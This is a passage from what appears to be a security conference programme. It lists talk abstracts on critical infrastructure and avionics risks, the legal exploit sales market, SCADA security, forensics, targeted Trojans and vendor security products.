If my computer crashes, it's not the end of the world - it just seems that way sometimes, when I lose 3+ hours of work. But computers are appearing everywhere - in our phones, cars, airplanes, medical devices and urban infrastructure in more ways that we imagine, and they are networked in more ways than we know. Our telephone network is becoming more and more IP based. Generators and power systems are on the internet for "maintenance and diagnostic purposes", but they are also the targets of hackers (with catastrophic consequences). The new Boeing 787 will have in-flight internet access at each seat, but the same network will be connected to the avionics. Pacemakers can be hacked wirelessly. Suddenly a computer crash threatens more than 3 hours of work, it threatens my life! And while man-rated systems are rigorously tested for proper functioning, it is much harder to prove the negative that "you can't break in". This talk will look at some fundamental assumptions about security that cannot be addressed with the "patch it in the next release" mentality - we have to get it right the first time. What I hope to convey is that Security (and paranoia) has to be a lifestyle choice and not just your job. And as security professionals, we need to convince everyone that there are no shortcuts - because the shortest path from 35,000 feet is straight down. |
|
| Adventures in Disclosure: A Look at the Legal Exploit Sales Market | |
| Charles Miller - Independent Security Evaluators | |
|
This talk will focus on the topic of vulnerability disclosure from the perspective of a security researcher. The different forms of disclosure as well as researcher motivations will be discussed. Significant time will be spent on the legal exploit sales market. A few case studies involving disclosures I've made will be addressed. The talk will culminate in a discussion of the implications of these topics on Internet security in general. |
|
| Identity Monitoring – Know What They Did Last Night | |
| Colby DeRodeff - WhiteGold Solutions | |
|
When protecting your business regardless of your vertical it is important to not only look at perimetre threats but also the threat that internal “trusted” users pose to your organization. User activity monitoring is meant not to violate the trust that you have for your employees but to ensure that your “crown jewels” are protected. What are the crown jewels? These days it's data, whether company information or credit card numbers it's all valuable and it lives within databases and is accessed through applications. This is why it is extremely important to monitor data access through these parts of the enterprise. This presentation takes an indepth look at challenges, mistakes and how to accomplish this feat using security information management solutions as a platform to solve this complex issue. Included in the presentation are real life use-cases showing the benefits of this bleeding edge integration. |
|
| Making a security professionals life easier! | |
| Andrew Kelly and Guy Lupo - CA | |
|
One of the major pains for the modern security professional is compliance. It has to be done but takes up an inordinate amount of time and resources to make sure the auditors are happy. The ideal solution would automate compliance-related security processes, especially in access and approval management, i.e. automating the access reviews. Enter CA's Melbourne-based IAM Research and Development Centre - a world-leading developer of innovative identity management and compliance solutions. Learn why CA entrusted a new flagship identity compliance product to the Melbourne labs and how this product is helping organizations, both locally and globally, be secure and comply with legislation.You be the judge about whether this new solution is ahead of the pack. |
|
| Identity Validation and Ad-hoc File Transfer | |
| Hari Nair - Tumbleweed | |
|
Identity Validation: Managed file transfer is a rapidly growing segment in Enterprise Security, one in which Tumbleweed has established a reputation as a market leader. Now, by integrating this technology with our award-winning range of email security products, we are also addressing the need for an ad-hoc file transfer solution. This 15 minute presentation will attempt to provide insight into what to look for when evaluating the myriad of attachment-offloading solutions available today. |
|
| Fear, Uncertainty and the Digital Armageddon | |
| Morgan Marquis-Boire - Dimension Data | |
|
We now live in an age where attacks on critical infrastructure can cause real world harm. An increasing global concern regarding cyber-terrorism reflects the problem critical infrastructure security poses for many large IT consulting companies, telecommunications providers, utilities and industrial companies. Speaking as a representative of Dimension Data and Datacraft, Morgan Marquis-Boire will provide an introduction to critical infrastructure environments and SCADA networks, and the major differences that exist between understood security best practice and the protective measures regularly found (or not found) in these networks.The most common security mistakes and real world examples will be covered, which will expose some of the potentially catastrophic consequences of a failure in a production SCADA environment. There will be an examination of the critical infrastructure hysteria which is currently in vogue and some consideration of steps which can be taken to secure these networks and prevent cyber-terrorism. |
|
| Presentation to be announced | |
| - b-sec/Deloittes | |
| Components of the Digital Investigation Challenge | |
| Trey Tramonte and John Fatten - Fulcrum Management | |
|
When your teams have to deal with data theft, fraud, sexual harassment, Sarbanes-Oxley, unfair dismissal and cyber attacks your First Responders need the right procedures, training and tools to secure the electronic evidence. Fulcrum Management is the premier supplier of Computer Forensic technology, tools and training services in Australia, New Zealand and parts of SE Asia. Since 1987, AccessData tools have become standard issue for computer forensic investigators all over the world.Introducing AccessData’s Digital Forensic Toolkit for Internal Litigation Preparedness. AccessData eDiscovery facilitates a project management approach to electronic discovery and streamlines the eDiscovery processes from the point of litigation hold all the way to production. |
|
| Targeted Attacks: An Evolution | |
| Mark Sunner - MessageLabs | |
|
Towards the end of 2007, MessageLabs saw a dramatic shift in the profile of targeted attacks heading towards a global audience. In just 12 months the average number of interceptions we were making went from an average of around ten per day to several thousand per hour. Something had obviously changed within the threat landscape and the change was significant. In this presentation we will examine how the threat landscape as a whole shifted in 2007 looking at spam, virus and phishing profiles and how they themselves also started to target more precisely their intended audiences. We will look closely at the exact evolution of targeted Trojans and the shadow economy that is fuelling targeted Trojan growth. Finally we will see how the recent explosion of social networking sites available is actually playing directly into the hands of the bad guys by yielding a ripe source of up-to-date data from which they can craft more socially engineered attacks. |
|
| Network Security Consolidation with Fortinet | |
| Anthony James - Fortinet | |
|
As an IT professional concerned with network security, you are confronted by a constantly-evolving array of threats and increasing compliance requirements. But you have to balance your ability to manage this dynamic threat-scape against many other imperatives, including cost (both CapEx and OpEx), limited power and data center space, manageability, and, increasing environmental concerns. This presentation provides guidance and real world examples on how network security consolidation using an unified security solution platform can help you address these challenges and deliver more effective security architecture aligned with business requirements, notable cost savings, with a reduced physical, power and environmental footprint. |
|
| An Executive Approach to Security | |
| Timothy Dole - Tier-3 | |
|
Today IT and business executives are struggling to understand how to better leverage their security spend to achieve business requirements for security. With an understanding of the start and finish to security, organizations can better prioritise requirements relevant to their specific business. A security roadmap aligned to the business allows organizations to better direct funding, quickly respond to changing business requirements and accurately define security budgets. With a clearly defined security framework and roadmap organizations can engage technology partners strategically, better leveraging their IT spend to achieve corporate security objectives rather than opting for point solutions. This session discusses why executives are struggling with security compliance and talks about how to ease the pain. |
|
| Using Reputation to Beat Next-Gen Malware | |
| Mike Bessey - IronPort Systems | |
|
Iframes and cross-site scripting can lead users to objects that aren't caught by signature or heuristics-based scans. IronPort has found a way to use its huge reputation database to prevent PCs from becoming bots or victims of malware attacks. In this session we'll explore zero-day blended threats, how behaviour and reputation can complement traditional signature scanning, and how you can prevent your users from picking up nasty infections as they surf the web. This session examines the extra risks posed by encryption, double flux and reputation theft. This session will also explain how IronPort's market-leading success in email security made it possible to improve web security. Finally, we'll describe how IronPort's email and web reputation technology is impacting other Cisco product families. |
|
| The Perfect Storm! - Security Today | |
| Adam Biviano - Trend Micro | |
|
Threats to your information assets have recently taken a turn for the worst. No longer are we facing bored hackers making a name for themselves, but highly structured and well funded groups of attackers. We need to understand how individual threat techniques learned from the past have combined to form the perfect storm. Vendors can no longer rely on creating iterations of traditional technologies but need to need to look |